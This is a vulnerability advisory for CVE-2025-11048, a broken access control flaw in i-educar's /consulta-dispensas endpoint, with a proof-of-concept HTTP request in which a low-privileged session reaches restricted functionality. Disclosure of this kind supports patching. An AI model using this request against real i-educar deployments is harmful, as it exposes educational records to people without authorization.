
CVE-2025-11048: Broken Access Control in /consulta-dispensas Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-11048

Summary

A Broken Access Control vulnerability was identified in the /consulta-dispensas endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.

Details

Vulnerable Endpoint: GET /consulta-dispensas
Authentication: Required

The application fails to validate the requesting user's permissions before serving this endpoint. As a result, even a low-privileged user can successfully reach functionality intended only for .

PoC

  • Authenticate as a non-privileged user.

  • Send the following request:

GET /consulta-dispensas HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: i_educar_session=[low_privileged cookie]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i

  • The response shows that the page and its function are accessible to this user, who should not have that access.

Impact

Broken Access Control vulnerabilities can have severe consequences, including:

  • Unauthorized access to restricted functionality;
  • Escalation of privileges for low-level users;
  • Exposure of sensitive data and potential system compromise;
  • Loss of confidentiality and integrity of educational records;
  • Reputational damage to the organization.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md

Finder

Marcelo Queiroz

By: CVE-Hunters
